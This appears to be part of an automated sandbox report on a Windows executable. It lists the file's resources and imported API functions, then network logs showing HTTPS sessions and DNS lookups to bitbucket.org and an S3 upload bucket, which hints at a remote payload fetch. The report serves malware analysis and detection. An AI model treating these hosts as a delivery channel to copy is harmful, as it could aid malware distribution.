RT_BITMAP | 0x6edbc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x6ef8c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x6f15c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x6f32c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x6f4fc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x6f6cc | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x6f89c | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5208333333333334
RT_BITMAP | 0x6f95c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42857142857142855
RT_BITMAP | 0x6fa3c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.4955357142857143
RT_BITMAP | 0x6fb1c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.38392857142857145
RT_BITMAP | 0x6fbfc | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4947916666666667
RT_BITMAP | 0x6fcbc | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.484375
RT_BITMAP | 0x6fd7c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42410714285714285
RT_BITMAP | 0x6fe5c | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5104166666666666
RT_BITMAP | 0x6ff1c | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.5
RT_BITMAP | 0x6fffc | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_BITMAP | 0x700e4 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4895833333333333
RT_BITMAP | 0x701a4 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.3794642857142857
RT_ICON | 0x70284 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m | | | 0.3139344262295082
RT_ICON | 0x70c0c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m | | | 0.2352251407129456
RT_ICON | 0x71cb4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.16815352697095437
RT_DIALOG | 0x7425c | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x742b0 | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x74304 | 0x2c | data | | | 0.4772727272727273
RT_STRING | 0x74330 | 0x2b4 | data | | | 0.476878612716763
RT_STRING | 0x745e4 | 0xb4 | data | | | 0.6888888888888889
RT_STRING | 0x74698 | 0xe8 | data | | | 0.6422413793103449
RT_STRING | 0x74780 | 0x2a8 | data | | | 0.4764705882352941
RT_STRING | 0x74a28 | 0x3e8 | data | | | 0.382
RT_STRING | 0x74e10 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x75180 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x7554c | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x75760 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x7582c | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x759c0 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x75d84 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x760bc | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x76350 | 0x10 | data | | | 1.5
RT_RCDATA | 0x76360 | 0x31c | data | | | 0.7010050251256281
RT_RCDATA | 0x7667c | 0x189 | Delphi compiled form 'TForm1' | | | 0.7582697201017812
RT_RCDATA | 0x76808 | 0x8f0bc | data | English | United States | 0.40106602311594153
RT_GROUP_CURSOR | 0x1058c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x1058d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x1058ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x105900 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x105914 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x105928 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10593c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x105950 | 0x30 | data | | | 0.9375
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                              kernel32.dllSleep
                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Oct 31, 2024 09:07:01.665208101 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.509480953 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.509687901 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.511360884 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.511372089 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.511601925 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.513432026 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.555373907 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.934725046 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.934745073 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.934812069 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.934822083 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.934844017 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.934889078 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.936311007 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.936326981 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.936342955 CET49708443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:02.936347008 CET44349708185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:02.938877106 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:02.938895941 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:02.938966036 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:02.939390898 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:02.939403057 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.606864929 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.606981993 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:03.608140945 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:03.608148098 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.608375072 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.609570026 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:03.655384064 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.801691055 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.803714037 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.803728104 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.803900957 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:03.803917885 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.803975105 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:03.920566082 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.920587063 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.920629978 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.920691967 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:03.920713902 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:03.920743942 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:03.962570906 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.036246061 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.036262035 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.036294937 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.036305904 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.036360025 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.036377907 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.036411047 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.036426067 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.078114986 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.078133106 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.078159094 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.078278065 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.078303099 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.078476906 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.125557899 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.154386997 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.154402971 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.154433966 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.154489040 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.154506922 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.154548883 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.205566883 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.269917965 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.269927025 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.269968033 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.270004034 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.270014048 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.270061016 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.270066023 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.271625042 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.271648884 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.271699905 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.271709919 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.271780014 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.317564964 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.387845039 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.387856960 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.387888908 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.387900114 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.387917995 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.387953043 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.387963057 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.388005972 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.389435053 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.389453888 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.389501095 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.389508963 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.389559031 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.428864956 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.428946972 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.504260063 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.504273891 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.504302025 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.504347086 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.504360914 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.504388094 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.545262098 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.545283079 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.545348883 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.545375109 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.589564085 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.621376038 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.621385098 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.621434927 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.621464968 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.621485949 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.621498108 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.621566057 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.621579885 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.662043095 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.662058115 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.662084103 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.662139893 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.662151098 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.662198067 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.738270998 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.738281965 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.738315105 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.738341093 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.738348961 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.738393068 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.738410950 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.738451004 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.779110909 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.779138088 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.779227972 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.779242039 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.829564095 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855276108 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855287075 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855348110 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855360985 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855412960 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855432987 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855463982 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855526924 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855530977 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895847082 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895855904 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895870924 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895889044 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895925045 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.895935059 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895977020 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.941555023 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.971946001 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.971956015 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.971992970 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972002029 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972023964 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972054958 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.972064018 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972104073 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.019182920 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019222975 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019232988 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019246101 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019285917 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.019301891 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019372940 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.071855068 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.088224888 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088233948 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088278055 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088293076 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088315964 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088324070 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088324070 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.088397980 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.089715958 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.089723110 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.089759111 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.089768887 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.091131926 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.094237089 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.094244003 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.149581909 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173146009 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173154116 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173197031 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173208952 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173238993 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173242092 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173293114 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173707962 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173722029 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173744917 CET49709443192.168.2.552.217.102.228

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 09:06:57.131051064 CET | 50145 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 09:06:57.138525963 CET | 53 | 50145 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 09:06:58.835000992 CET | 51396 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 09:06:58.863223076 CET | 53 | 51396 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 09:07:06.501331091 CET | 63859 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 09:07:06.520440102 CET | 53 | 63859 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 09:06:57.131051064 CET | 192.168.2.5 | 1.1.1.1 | 0xffc6 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Oct 31, 2024 09:06:58.835000992 CET | 192.168.2.5 | 1.1.1.1 | 0xbb1 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
